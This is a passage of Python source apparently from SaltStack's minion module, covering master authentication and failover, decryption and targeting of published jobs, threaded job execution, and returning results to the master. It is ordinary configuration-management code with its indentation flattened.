# salt.utils.cli.yamlify_arg(), which could mangle the input.
_args.append(arg)
elif string_kwarg:
salt.utils.warn_until(
'Boron',
'The list of function args and kwargs should be parsed '
'by salt.utils.args.parse_input() before calling '
'salt.minion.load_args_and_kwargs().'
)
if argspec.keywords or next(iter(string_kwarg.keys())) in argspec.args:
# Function supports **kwargs or is a positional argument to
# the function.
_kwargs.update(string_kwarg)
else:
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
invalid_kwargs.append('{0}'.format(arg))
continue
# if the arg is a dict with __kwarg__ == True, then its a kwarg
elif isinstance(arg, dict) and arg.pop('__kwarg__', False) is True:
for key, val in arg.items():
if argspec.keywords or key in argspec.args:
# Function supports **kwargs or is a positional argument to
# the function.
_kwargs[key] = val
else:
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
invalid_kwargs.append('{0}'.format(arg))
continue
else:
_args.append(arg)
if invalid_kwargs:
raise SaltInvocationError(
'The following keyword arguments are not valid: {0}'
.format(', '.join(invalid_kwargs))
)
if argspec.keywords and isinstance(data, dict):
# this function accepts **kwargs, pack in the publish data
for key, val in data.items():
_kwargs['__pub_{0}'.format(key)] = val
return _args, _kwargs
class SMinion(object):
'''
Create an object that has loaded all of the minion module functions,
grains, modules, returners etc. The SMinion allows developers to
generate all of the salt minion functions and present them with these
functions for general use.
'''
def __init__(self, opts):
# Late setup of the opts grains, so we can log from the grains module
opts['grains'] = salt.loader.grains(opts)
self.opts = opts
# Clean out the proc directory (default /var/cache/salt/minion/proc)
if (self.opts.get('file_client', 'remote') == 'remote'
or self.opts.get('use_master_when_local', False)):
if isinstance(self.opts['master'], list):
masters = self.opts['master']
if self.opts['random_master'] is True:
shuffle(masters)
for master in masters:
self.opts['master'] = master
self.opts.update(resolve_dns(opts))
try:
self.gen_modules()
break
except SaltClientError:
log.warning(('Attempted to authenticate with master '
'{0} and failed'.format(master)))
continue
else:
if self.opts['random_master'] is True:
log.warning('random_master is True but there is only one master specified. Ignoring.')
self.opts.update(resolve_dns(opts))
self.gen_modules(initial_load=True)
else:
self.gen_modules(initial_load=True)
def gen_modules(self, initial_load=False):
'''
Load all of the modules for the minion
'''
self.opts['pillar'] = salt.pillar.get_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment']
).compile_pillar()
self.functions = salt.loader.minion_mods(self.opts, include_errors=True)
self.function_errors = self.functions['_errors']
self.functions.pop('_errors') # Keep the funcs clean
self.returners = salt.loader.returners(self.opts, self.functions)
self.states = salt.loader.states(self.opts, self.functions)
self.rend = salt.loader.render(self.opts, self.functions)
self.matcher = Matcher(self.opts, self.functions)
self.functions['sys.reload_modules'] = self.gen_modules
class MinionBase(object):
def __init__(self, opts):
self.opts = opts
def _init_context_and_poller(self):
self.context = zmq.Context()
self.poller = zmq.Poller()
def _prepare_minion_event_system(self):
# Prepare the minion event system
#
# Start with the publish socket
self._init_context_and_poller()
hash_type = getattr(hashlib, self.opts.get('hash_type', 'md5'))
# Only use the first 10 chars to keep longer hashes from exceeding the
# max socket path length.
id_hash = hash_type(self.opts['id']).hexdigest()[:10]
epub_sock_path = os.path.join(
self.opts['sock_dir'],
'minion_event_{0}_pub.ipc'.format(id_hash)
)
if os.path.exists(epub_sock_path):
os.unlink(epub_sock_path)
epull_sock_path = os.path.join(
self.opts['sock_dir'],
'minion_event_{0}_pull.ipc'.format(id_hash)
)
if os.path.exists(epull_sock_path):
os.unlink(epull_sock_path)
self.epub_sock = self.context.socket(zmq.PUB)
if self.opts.get('ipc_mode', '') == 'tcp':
epub_uri = 'tcp://127.0.0.1:{0}'.format(
self.opts['tcp_pub_port']
)
epull_uri = 'tcp://127.0.0.1:{0}'.format(
self.opts['tcp_pull_port']
)
else:
epub_uri = 'ipc://{0}'.format(epub_sock_path)
salt.utils.zeromq.check_ipc_path_max_len(epub_uri)
epull_uri = 'ipc://{0}'.format(epull_sock_path)
salt.utils.zeromq.check_ipc_path_max_len(epull_uri)
log.debug(
'{0} PUB socket URI: {1}'.format(
self.__class__.__name__, epub_uri
)
)
log.debug(
'{0} PULL socket URI: {1}'.format(
self.__class__.__name__, epull_uri
)
)
# Check to make sure the sock_dir is available, create if not
default_minion_sock_dir = os.path.join(
salt.syspaths.SOCK_DIR,
'minion'
)
minion_sock_dir = self.opts.get('sock_dir', default_minion_sock_dir)
if not os.path.isdir(minion_sock_dir):
# Let's try to create the directory defined on the configuration
# file
try:
os.makedirs(minion_sock_dir, 0o755)
except OSError as exc:
log.error('Could not create SOCK_DIR: {0}'.format(exc))
# Let's not fail yet and try using the default path
if minion_sock_dir == default_minion_sock_dir:
# We're already trying the default system path, stop now!
raise
if not os.path.isdir(default_minion_sock_dir):
try:
os.makedirs(default_minion_sock_dir, 0o755)
except OSError as exc:
log.error('Could not create SOCK_DIR: {0}'.format(exc))
# Let's stop at this stage
raise
# Create the pull socket
self.epull_sock = self.context.socket(zmq.PULL)
# Securely bind the event sockets
if self.opts.get('ipc_mode', '') != 'tcp':
old_umask = os.umask(0o177)
try:
log.info('Starting pub socket on {0}'.format(epub_uri))
self.epub_sock.bind(epub_uri)
log.info('Starting pull socket on {0}'.format(epull_uri))
self.epull_sock.bind(epull_uri)
finally:
if self.opts.get('ipc_mode', '') != 'tcp':
os.umask(old_umask)
@staticmethod
def process_schedule(minion, loop_interval):
try:
minion.schedule.eval()
# Check if scheduler requires lower loop interval than
# the loop_interval setting
if minion.schedule.loop_interval < loop_interval:
loop_interval = minion.schedule.loop_interval
log.debug(
'Overriding loop_interval because of scheduled jobs.'
)
except Exception as exc:
log.error(
'Exception {0} occurred in scheduled job'.format(exc)
)
return loop_interval
class MasterMinion(object):
'''
Create a fully loaded minion function object for generic use on the
master. What makes this class different is that the pillar is
omitted, otherwise everything else is loaded cleanly.
'''
def __init__(
self,
opts,
returners=True,
states=True,
rend=True,
matcher=True,
whitelist=None):
self.opts = salt.config.minion_config(opts['conf_file'])
self.opts.update(opts)
self.whitelist = whitelist
self.opts['grains'] = salt.loader.grains(opts)
self.opts['pillar'] = {}
self.mk_returners = returners
self.mk_states = states
self.mk_rend = rend
self.mk_matcher = matcher
self.gen_modules(initial_load=True)
def gen_modules(self, initial_load=False):
'''
Load all of the modules for the minion
'''
self.functions = salt.loader.minion_mods(
self.opts,
whitelist=self.whitelist,
initial_load=initial_load)
if self.mk_returners:
self.returners = salt.loader.returners(self.opts, self.functions)
if self.mk_states:
self.states = salt.loader.states(self.opts, self.functions)
if self.mk_rend:
self.rend = salt.loader.render(self.opts, self.functions)
if self.mk_matcher:
self.matcher = Matcher(self.opts, self.functions)
self.functions['sys.reload_modules'] = self.gen_modules
class MultiMinion(MinionBase):
'''
Create a multi minion interface, this creates as many minions as are
defined in the master option and binds each minion object to a respective
master.
'''
# timeout for one of the minions to auth with a master
MINION_CONNECT_TIMEOUT = 5
def __init__(self, opts):
super(MultiMinion, self).__init__(opts)
def minions(self):
'''
Return a dict of minion generators bound to the tune_in method
dict of master -> minion_mapping, the mapping contains:
opts: options used to create the minion
last: last auth attempt time
auth_wait: time to wait for next auth attempt
minion: minion object
generator: generator function (non-blocking tune_in)
'''
if not isinstance(self.opts['master'], list):
log.error(
'Attempting to start a multimaster system with one master')
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
ret = {}
for master in set(self.opts['master']):
s_opts = copy.copy(self.opts)
s_opts['master'] = master
s_opts['multimaster'] = True
ret[master] = {'opts': s_opts,
'last': time.time(),
'auth_wait': s_opts['acceptance_wait_time']}
try:
minion = Minion(s_opts, self.MINION_CONNECT_TIMEOUT, False)
ret[master]['minion'] = minion
ret[master]['generator'] = minion.tune_in_no_block()
except SaltClientError as exc:
log.error('Error while bringing up minion for multi-master. Is master at {0} responding?'.format(master))
return ret
# Multi Master Tune In
def tune_in(self):
'''
Bind to the masters
This loop will attempt to create connections to masters it hasn't connected
to yet, but once the initial connection is made it is up to ZMQ to do the
reconnect (don't know of an API to get the state here in salt)
'''
self._prepare_minion_event_system()
self.poller.register(self.epull_sock, zmq.POLLIN)
# Prepare the minion generators
minions = self.minions()
loop_interval = int(self.opts['loop_interval'])
auth_wait = self.opts['acceptance_wait_time']
max_wait = self.opts['acceptance_wait_time_max']
while True:
package = None
for minion in minions.values():
if isinstance(minion, dict):
minion = minion['minion']
if not hasattr(minion, 'schedule'):
continue
loop_interval = self.process_schedule(minion, loop_interval)
socks = dict(self.poller.poll(1))
if socks.get(self.epull_sock) == zmq.POLLIN:
try:
package = self.epull_sock.recv(zmq.NOBLOCK)
except Exception:
pass
masters = list(minions.keys())
shuffle(masters)
# Do stuff per minion that we have
for master in masters:
minion = minions[master]
# if we haven't connected yet, lets attempt some more.
# make sure to keep separate auth_wait times, since these
# are separate masters
if 'generator' not in minion:
if time.time() - minion['auth_wait'] > minion['last']:
minion['last'] = time.time()
if minion['auth_wait'] < max_wait:
minion['auth_wait'] += auth_wait
try:
t_minion = Minion(minion['opts'], self.MINION_CONNECT_TIMEOUT, False)
minions[master]['minion'] = t_minion
minions[master]['generator'] = t_minion.tune_in_no_block()
minions[master]['auth_wait'] = self.opts['acceptance_wait_time']
except SaltClientError:
                            log.error('Error while bringing up minion for multi-master. Is master {0} responding?'.format(master))
continue
else:
continue
# run scheduled jobs if you have them
loop_interval = self.process_schedule(minion['minion'], loop_interval)
# if you have an event to handle, do it on a single minion
# (first one to not throw an exception)
if package:
# If we need to expand this, we may want to consider a specific header
# or another approach entirely.
if package.startswith('_minion_mine'):
for multi_minion in minions:
try:
                                minions[multi_minion]['minion'].handle_event(package)
except Exception:
pass
else:
try:
                            minion['minion'].handle_event(package)
                            self.epub_sock.send(package)
                            package = None
except Exception:
pass
# have the Minion class run anything it has to run
next(minion['generator'])
class Minion(MinionBase):
'''
This class instantiates a minion, runs connections for a minion,
and loads all of the functions into the minion
'''
def __init__(self, opts, timeout=60, safe=True): # pylint: disable=W0231
'''
Pass in the options dict
'''
self._running = None
# Warn if ZMQ < 3.2
if HAS_ZMQ:
try:
zmq_version_info = zmq.zmq_version_info()
except AttributeError:
# PyZMQ <= 2.1.9 does not have zmq_version_info, fall back to
# using zmq.zmq_version() and build a version info tuple.
zmq_version_info = tuple(
[int(x) for x in zmq.zmq_version().split('.')]
)
if zmq_version_info < (3, 2):
log.warning(
'You have a version of ZMQ less than ZMQ 3.2! There are '
'known connection keep-alive issues with ZMQ < 3.2 which '
'may result in loss of contact with minions. Please '
'upgrade your ZMQ!'
)
        # Late setup of the opts grains, so we can log from the grains
        # module
opts['grains'] = salt.loader.grains(opts)
# evaluate the master to connect to and authenticate with it
opts['master'] = self.eval_master(opts,
timeout,
safe)
self.opts['pillar'] = salt.pillar.get_pillar(
opts,
opts['grains'],
opts['id'],
opts['environment']
).compile_pillar()
self.functions, self.returners, self.function_errors = self._load_modules()
self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
self.matcher = Matcher(self.opts, self.functions)
self.proc_dir = get_proc_dir(opts['cachedir'])
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners)
# add default scheduling jobs to the minions scheduler
if 'mine.update' in self.functions:
log.info('Added mine.update to scheduler')
self.schedule.add_job({
'__mine_interval':
{
'function': 'mine.update',
'minutes': opts['mine_interval'],
'jid_include': True,
'maxrunning': 2
}
})
# add master_alive job if enabled
if self.opts['master_alive_interval'] > 0:
self.schedule.add_job({
'__master_alive':
{
'function': 'status.master',
'seconds': opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'kwargs': {'master_ip': self.opts['master'],
'connected': True}
}
})
self.grains_cache = self.opts['grains']
        # store your hexid to subscribe to zmq; hash it since zmq filters are
        # prefix matches, this way we can avoid collisions
self.hexid = hashlib.sha1(self.opts['id']).hexdigest()
if 'proxy' in self.opts['pillar']:
log.debug('I am {0} and I need to start some proxies for {1}'.format(self.opts['id'],
self.opts['pillar']['proxy']))
for p in self.opts['pillar']['proxy']:
log.debug('Starting {0} proxy.'.format(p))
pid = os.fork()
if pid > 0:
continue
else:
proxyminion = salt.ProxyMinion()
proxyminion.start(self.opts['pillar']['proxy'][p])
self.clean_die(signal.SIGTERM, None)
else:
log.debug('I am {0} and I am not supposed to start any proxies. '
'(Likely not a problem)'.format(self.opts['id']))
# __init__() from MinionBase is called in Minion.eval_master()
def eval_master(self,
opts,
timeout=60,
safe=True,
failed=False):
'''
Evaluates and returns the current master address. In standard mode, just calls
authenticate() with the given master address.
With master_type=func evaluates the current master address from the given
module and then calls authenticate().
With master_type=failover takes the list of masters and loops through them.
The first one that allows the minion to connect is used to authenticate() and
then returned. If this function is called outside the minions initialization
phase (for example from the minions main event-loop when a master connection
loss was detected), 'failed' should be set to True. The current
(possibly failed) master will then be removed from the list of masters.
'''
# check if master_type was altered from its default
if opts['master_type'] != 'str':
# check for a valid keyword
if opts['master_type'] == 'func':
# split module and function and try loading the module
mod, fun = opts['master'].split('.')
try:
master_mod = salt.loader.raw_mod(opts, mod, fun)
if not master_mod:
raise TypeError
# we take whatever the module returns as master address
opts['master'] = master_mod[mod + '.' + fun]()
except TypeError:
msg = ('Failed to evaluate master address from '
'module \'{0}\''.format(opts['master']))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
log.info('Evaluated master from module: {0}'.format(master_mod))
# if failover is set, master has to be of type list
elif opts['master_type'] == 'failover':
if isinstance(opts['master'], list):
log.info('Got list of available master addresses:'
' {0}'.format(opts['master']))
if opts['master_shuffle']:
shuffle(opts['master'])
elif opts['__role'] == 'syndic':
log.info('Syndic setting master_syndic to \'{0}\''.format(opts['master']))
# if failed=True, the minion was previously connected
# we're probably called from the minions main-event-loop
# because a master connection loss was detected. remove
# the possibly failed master from the list of masters.
elif failed:
log.info('Removing possibly failed master {0} from list of'
' masters'.format(opts['master']))
# create new list of master with the possibly failed one removed
opts['master'] = [x for x in opts['master_list'] if opts['master'] != x]
else:
msg = ('master_type set to \'failover\' but \'master\' '
'is not of type list but of type '
'{0}'.format(type(opts['master'])))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
else:
msg = ('Invalid keyword \'{0}\' for variable '
'\'master_type\''.format(opts['master_type']))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
# if we have a list of masters, loop through them and be
# happy with the first one that allows us to connect
if isinstance(opts['master'], list):
conn = False
# shuffle the masters and then loop through them
local_masters = copy.copy(opts['master'])
for master in local_masters:
opts['master'] = master
opts.update(resolve_dns(opts))
super(Minion, self).__init__(opts)
# on first run, update self.opts with the whole master list
# to enable a minion to re-use old masters if they get fixed
if 'master_list' not in self.opts:
self.opts['master_list'] = local_masters
try:
if self.authenticate(timeout, safe) != 'full':
conn = True
break
except SaltClientError:
msg = ('Master {0} could not be reached, trying '
'next master (if any)'.format(opts['master']))
log.info(msg)
continue
if not conn:
self.connected = False
msg = ('No master could be reached or all masters denied '
'the minions connection attempt.')
log.error(msg)
else:
self.connected = True
return opts['master']
# single master sign in
else:
opts.update(resolve_dns(opts))
super(Minion, self).__init__(opts)
if self.authenticate(timeout, safe) == 'full':
self.connected = False
msg = ('master {0} rejected the minions connection because too '
'many minions are already connected.'.format(opts['master']))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
else:
self.connected = True
return opts['master']
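    # Editorial summary of the master_type handling above (values illustrative):
    #     master_type: str       -> opts['master'] = 'salt.example.com'
    #     master_type: func      -> opts['master'] = 'mymod.get_master'   # module.function
    #     master_type: failover  -> opts['master'] = ['m1.example.com', 'm2.example.com']
    #                               optionally shuffled when master_shuffle is set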
def _prep_mod_opts(self):
'''
Returns a copy of the opts with key bits stripped out
'''
mod_opts = {}
for key, val in self.opts.items():
if key == 'logger':
continue
mod_opts[key] = val
return mod_opts
def _load_modules(self, force_refresh=False):
'''
Return the functions and the returners loaded up from the loader
module
'''
# if this is a *nix system AND modules_max_memory is set, lets enforce
# a memory limit on module imports
# this feature ONLY works on *nix like OSs (resource module doesn't work on windows)
modules_max_memory = False
if self.opts.get('modules_max_memory', -1) > 0 and HAS_PSUTIL and HAS_RESOURCE:
log.debug('modules_max_memory set, enforcing a maximum of {0}'.format(self.opts['modules_max_memory']))
modules_max_memory = True
old_mem_limit = resource.getrlimit(resource.RLIMIT_AS)
rss, vms = psutil.Process(os.getpid()).get_memory_info()
mem_limit = rss + vms + self.opts['modules_max_memory']
resource.setrlimit(resource.RLIMIT_AS, (mem_limit, mem_limit))
elif self.opts.get('modules_max_memory', -1) > 0:
if not HAS_PSUTIL:
log.error('Unable to enforce modules_max_memory because psutil is missing')
if not HAS_RESOURCE:
log.error('Unable to enforce modules_max_memory because resource is missing')
self.opts['grains'] = salt.loader.grains(self.opts, force_refresh)
if self.opts.get('multimaster', False):
s_opts = copy.copy(self.opts)
functions = salt.loader.minion_mods(s_opts)
else:
functions = salt.loader.minion_mods(self.opts)
returners = salt.loader.returners(self.opts, functions)
errors = {}
if '_errors' in functions:
errors = functions['_errors']
functions.pop('_errors')
# we're done, reset the limits!
if modules_max_memory is True:
resource.setrlimit(resource.RLIMIT_AS, old_mem_limit)
return functions, returners, errors
def _fire_master(self, data=None, tag=None, events=None, pretag=None):
'''
Fire an event on the master, or drop message if unable to send.
'''
load = {'id': self.opts['id'],
'cmd': '_minion_event',
'pretag': pretag,
'tok': self.tok}
if events:
load['events'] = events
elif data and tag:
load['data'] = data
load['tag'] = tag
elif not data and tag:
load['data'] = {}
load['tag'] = tag
else:
return
channel = salt.transport.Channel.factory(self.opts)
try:
result = channel.send(load)
except Exception:
log.info("fire_master failed: {0}".format(traceback.format_exc()))
def _handle_payload(self, payload):
'''
Takes a payload from the master publisher and does whatever the
master wants done.
'''
{'aes': self._handle_aes,
'pub': self._handle_pub,
'clear': self._handle_clear}[payload['enc']](payload['load'],
payload['sig'] if 'sig' in payload else None)
def _handle_aes(self, load, sig=None):
'''
Takes the AES encrypted load, checks the signature if pub signatures
are turned on, decrypts it, and runs the encapsulated instructions
'''
# Verify that the signature is valid
master_pubkey_path = os.path.join(self.opts['pki_dir'], 'minion_master.pub')
if sig and self.functions['config.get']('sign_pub_messages'):
if not salt.crypt.verify_signature(master_pubkey_path, load, sig):
raise AuthenticationError('Message signature failed to validate.')
try:
data = self.crypticle.loads(load)
except AuthenticationError:
# decryption of the payload failed, try to re-auth but wait
# random seconds if set in config with random_reauth_delay
if 'random_reauth_delay' in self.opts:
reauth_delay = randint(0, float(self.opts['random_reauth_delay']))
# This mitigates the issue wherein a long-running job might not return
# on a master key rotation. However, new commands issued during the re-auth
# splay period will still fail to return.
if not salt.utils.minion.running(self.opts):
log.debug('Waiting {0} seconds to re-authenticate'.format(reauth_delay))
time.sleep(reauth_delay)
else:
log.warning('Ignoring re-auth delay because jobs are running')
self.authenticate()
data = self.crypticle.loads(load)
# Verify that the publication is valid
if 'tgt' not in data or 'jid' not in data or 'fun' not in data \
or 'arg' not in data:
return
# Verify that the publication applies to this minion
# It's important to note that the master does some pre-processing
# to determine which minions to send a request to. So for example,
# a "salt -G 'grain_key:grain_val' test.ping" will invoke some
# pre-processing on the master and this minion should not see the
# publication if the master does not determine that it should.
if 'tgt_type' in data:
match_func = getattr(self.matcher,
'{0}_match'.format(data['tgt_type']), None)
if match_func is None:
return
if data['tgt_type'] in ('grain', 'grain_pcre', 'pillar'):
delimiter = data.get('delimiter', DEFAULT_TARGET_DELIM)
if not match_func(data['tgt'], delimiter=delimiter):
return
elif not match_func(data['tgt']):
return
else:
if not self.matcher.glob_match(data['tgt']):
return
# If the minion does not have the function, don't execute,
# this prevents minions that could not load a minion module
# from returning a predictable exception
#if data['fun'] not in self.functions:
# return
if 'user' in data:
log.info(
'User {0[user]} Executing command {0[fun]} with jid '
'{0[jid]}'.format(data)
)
else:
log.info(
'Executing command {0[fun]} with jid {0[jid]}'.format(data)
)
log.debug('Command details {0}'.format(data))
self._handle_decoded_payload(data)
def _handle_pub(self, load):
'''
Handle public key payloads
'''
pass
def _handle_clear(self, load):
'''
Handle un-encrypted transmissions
'''
pass
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
if isinstance(data['fun'], string_types):
if data['fun'] == 'sys.reload_modules':
self.functions, self.returners, self.function_errors = self._load_modules()
self.schedule.functions = self.functions
self.schedule.returners = self.returners
if isinstance(data['fun'], tuple) or isinstance(data['fun'], list):
target = Minion._thread_multi_return
else:
target = Minion._thread_return
# We stash an instance references to allow for the socket
# communication in Windows. You can't pickle functions, and thus
# python needs to be able to reconstruct the reference on the other
# side.
instance = self
# If we are running in multi-master mode, re-inject opts into module funcs
if instance.opts.get('multimaster', False):
for func in instance.functions:
sys.modules[instance.functions[func].__module__].__opts__ = self.opts
if self.opts['multiprocessing']:
if sys.platform.startswith('win'):
# let python reconstruct the minion on the other side if we're
# running on windows
instance = None
process = multiprocessing.Process(
target=target, args=(instance, self.opts, data)
)
else:
process = threading.Thread(
target=target, args=(instance, self.opts, data),
name=data['jid']
)
process.start()
if not sys.platform.startswith('win'):
process.join()
@classmethod
def _thread_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target, start the actual
minion side execution.
'''
# this seems awkward at first, but it's a workaround for Windows
# multiprocessing communication.
if not minion_instance:
minion_instance = cls(opts)
fn_ = os.path.join(minion_instance.proc_dir, data['jid'])
if opts['multiprocessing']:
salt.utils.daemonize_if(opts)
salt.utils.appendproctitle(data['jid'])
sdata = {'pid': os.getpid()}
sdata.update(data)
log.info('Starting a new job with PID {0}'.format(sdata['pid']))
with salt.utils.fopen(fn_, 'w+b') as fp_:
fp_.write(minion_instance.serial.dumps(sdata))
ret = {'success': False}
function_name = data['fun']
if function_name in minion_instance.functions:
try:
func = minion_instance.functions[data['fun']]
args, kwargs = load_args_and_kwargs(
func,
data['arg'],
data)
sys.modules[func.__module__].__context__['retcode'] = 0
return_data = func(*args, **kwargs)
if isinstance(return_data, types.GeneratorType):
ind = 0
iret = {}
for single in return_data:
if isinstance(single, dict) and isinstance(iret, dict):
iret.update(single)
else:
if not iret:
iret = []
iret.append(single)
tag = tagify([data['jid'], 'prog', opts['id'], str(ind)], 'job')
event_data = {'return': single}
minion_instance._fire_master(event_data, tag)
ind += 1
ret['return'] = iret
else:
ret['return'] = return_data
ret['retcode'] = sys.modules[func.__module__].__context__.get(
'retcode',
0
)
ret['success'] = True
except CommandNotFoundError as exc:
msg = 'Command required for {0!r} not found'.format(
function_name
)
log.debug(msg, exc_info=True)
ret['return'] = '{0}: {1}'.format(msg, exc)
ret['out'] = 'nested'
except CommandExecutionError as exc:
log.error(
'A command in {0!r} had a problem: {1}'.format(
function_name,
exc
),
exc_info_on_loglevel=logging.DEBUG
)
ret['return'] = 'ERROR: {0}'.format(exc)
ret['out'] = 'nested'
except SaltInvocationError as exc:
log.error(
'Problem executing {0!r}: {1}'.format(
function_name,
exc
),
exc_info_on_loglevel=logging.DEBUG
)
ret['return'] = 'ERROR executing {0!r}: {1}'.format(
function_name, exc
)
ret['out'] = 'nested'
except TypeError as exc:
msg = ('TypeError encountered executing {0}: {1}. See '
'debug log for more info.').format(function_name, exc)
log.warning(msg, exc_info_on_loglevel=logging.DEBUG)
ret['return'] = msg
ret['out'] = 'nested'
except Exception:
msg = 'The minion function caused an exception'
log.warning(msg, exc_info_on_loglevel=logging.DEBUG)
salt.utils.error.fire_exception(salt.exceptions.MinionError(msg), opts, job=data)
ret['return'] = '{0}: {1}'.format(msg, traceback.format_exc())
ret['out'] = 'nested'
else:
ret['return'] = '{0!r} is not available.'.format(function_name)
mod_name = function_name.split('.')[0]
if mod_name in minion_instance.function_errors:
ret['return'] += ' Possible reasons: {0!r}'.format(minion_instance.function_errors[mod_name])
ret['success'] = False
ret['retcode'] = 254
ret['out'] = 'nested'
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
if 'master_id' in data:
ret['master_id'] = data['master_id']
if 'metadata' in data:
if isinstance(data['metadata'], dict):
ret['metadata'] = data['metadata']
else:
log.warning('The metadata parameter must be a dictionary. Ignoring.')
minion_instance._return_pub(ret)
if data['ret']:
if 'ret_config' in data:
ret['ret_config'] = data['ret_config']
ret['id'] = opts['id']
for returner in set(data['ret'].split(',')):
try:
minion_instance.returners['{0}.returner'.format(
returner
)](ret)
except Exception as exc:
log.error(
'The return failed for job {0} {1}'.format(
data['jid'],
exc
)
)
log.error(traceback.format_exc())
@classmethod
def _thread_multi_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target, start the actual
minion side execution.
'''
salt.utils.appendproctitle(data['jid'])
# this seems awkward at first, but it's a workaround for Windows
# multiprocessing communication.
if not minion_instance:
minion_instance = cls(opts)
ret = {
'return': {},
'success': {},
}
for ind in range(0, len(data['fun'])):
ret['success'][data['fun'][ind]] = False
try:
func = minion_instance.functions[data['fun'][ind]]
args, kwargs = load_args_and_kwargs(
func,
data['arg'][ind],
data)
ret['return'][data['fun'][ind]] = func(*args, **kwargs)
ret['success'][data['fun'][ind]] = True
except Exception as exc:
trb = traceback.format_exc()
log.warning(
'The minion function caused an exception: {0}'.format(
exc
)
)
ret['return'][data['fun'][ind]] = trb
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
if 'metadata' in data:
ret['metadata'] = data['metadata']
minion_instance._return_pub(ret)
if data['ret']:
if 'ret_config' in data:
ret['ret_config'] = data['ret_config']
for returner in set(data['ret'].split(',')):
ret['id'] = opts['id']
try:
minion_instance.returners['{0}.returner'.format(
returner
)](ret)
except Exception as exc:
log.error(
'The return failed for job {0} {1}'.format(
data['jid'],
exc
)
)
def _return_pub(self, ret, ret_cmd='_return'):
'''
Return the data from the executed command to the master server
'''
jid = ret.get('jid', ret.get('__jid__'))
fun = ret.get('fun', ret.get('__fun__'))
if self.opts['multiprocessing']:
fn_ = os.path.join(self.proc_dir, jid)
if os.path.isfile(fn_):
try:
os.remove(fn_)
except (OSError, IOError):
# The file is gone already
pass
log.info('Returning information for job: {0}'.format(jid))
channel = salt.transport.Channel.factory(self.opts)
if ret_cmd == '_syndic_return':
load = {'cmd': ret_cmd,
'id': self.opts['id'],
'jid': jid,
'fun': fun,
'load': ret.get('__load__')}
load['return'] = {}
for key, value in ret.items():
if key.startswith('__'):
continue
load['return'][key] = value
else:
load = {'cmd': ret_cmd,
'id': self.opts['id']}
for key, value in list(ret.items()):
load[key] = value
if 'out' in ret:
if isinstance(ret['out'], string_types):
load['out'] = ret['out']
else:
log.error('Invalid outputter {0}. This is likely a bug.'
.format(ret['out']))
else:
try:
oput = self.functions[fun].__outputter__
except (KeyError, AttributeError, TypeError):
pass
else:
if isinstance(oput, string_types):
load['out'] = oput
if self.opts['cache_jobs']:
# Local job cache has been enabled
fn_ = os.path.join(
self.opts['cachedir'],
'minion_jobs',
load['jid'],
'return.p')
jdir = os.path.dirname(fn_)
if not os.path.isdir(jdir):
os.makedirs(jdir)
salt.utils.fopen(fn_, 'w+b').write(self.serial.dumps(ret))
try:
ret_val = channel.send(load)
except SaltReqTimeoutError:
msg = ('The minion failed to return the job information for job '
'{0}. This is often due to the master being shut down or '
'overloaded. If the master is running consider increasing '
'the worker_threads value.').format(jid)
log.warn(msg)
return ''
log.trace('ret_val = {0}'.format(ret_val))
return ret_val
def _state_run(self):
'''
Execute a state run based on information set in the minion config file
'''
if self.opts['startup_states']:
data = {'jid': 'req', 'ret': self.opts.get('ext_job_cache', '')}
if self.opts['startup_states'] == 'sls':
data['fun'] = 'state.sls'
data['arg'] = [self.opts['sls_list']]
elif self.opts['startup_states'] == 'top':
data['fun'] = 'state.top'
data['arg'] = [self.opts['top_file']]
else:
data['fun'] = 'state.highstate'
data['arg'] = []
self._handle_decoded_payload(data)
def _refresh_grains_watcher(self, refresh_interval_in_minutes):
'''
Create a loop that will fire a pillar refresh to inform a master about a change in the grains of this minion
:param refresh_interval_in_minutes:
:return: None
'''
if '__update_grains' not in self.opts.get('schedule', {}):
if 'schedule' not in self.opts:
self.opts['schedule'] = {}
self.opts['schedule'].update({
'__update_grains':
{
'function': 'event.fire',
'args': [{}, 'grains_refresh'],
'minutes': refresh_interval_in_minutes
}
})
def _set_tcp_keepalive(self):
if hasattr(zmq, 'TCP_KEEPALIVE'):
self.socket.setsockopt(
zmq.TCP_KEEPALIVE, self.opts['tcp_keepalive']
)
self.socket.setsockopt(
zmq.TCP_KEEPALIVE_IDLE, self.opts['tcp_keepalive_idle']
)
self.socket.setsockopt(
zmq.TCP_KEEPALIVE_CNT, self.opts['tcp_keepalive_cnt']
)
self.socket.setsockopt(
zmq.TCP_KEEPALIVE_INTVL, self.opts['tcp_keepalive_intvl']
)
def _set_reconnect_ivl(self):
recon_delay = self.opts['recon_default']
if self.opts['recon_randomize']:
recon_delay = randint(self.opts['recon_default'],
self.opts['recon_default'] + self.opts['recon_max']
)
log.debug("Generated random reconnect delay between '{0}ms' and '{1}ms' ({2})".format(
self.opts['recon_default'],
self.opts['recon_default'] + self.opts['recon_max'],
recon_delay)
)
log.debug("Setting zmq_reconnect_ivl to '{0}ms'".format(recon_delay))
self.socket.setsockopt(zmq.RECONNECT_IVL, recon_delay)
def _set_reconnect_ivl_max(self):
if hasattr(zmq, 'RECONNECT_IVL_MAX'):
log.debug("Setting zmq_reconnect_ivl_max to '{0}ms'".format(
self.opts['recon_default'] + self.opts['recon_max'])
)
self.socket.setsockopt(
zmq.RECONNECT_IVL_MAX, self.opts['recon_max']
)
def _set_ipv4only(self):
if self.opts['ipv6'] is True and hasattr(zmq, 'IPV4ONLY'):
# IPv6 sockets work for both IPv6 and IPv4 addresses
self.socket.setsockopt(zmq.IPV4ONLY, 0)
def _fire_master_minion_start(self):
# Send an event to the master that the minion is live
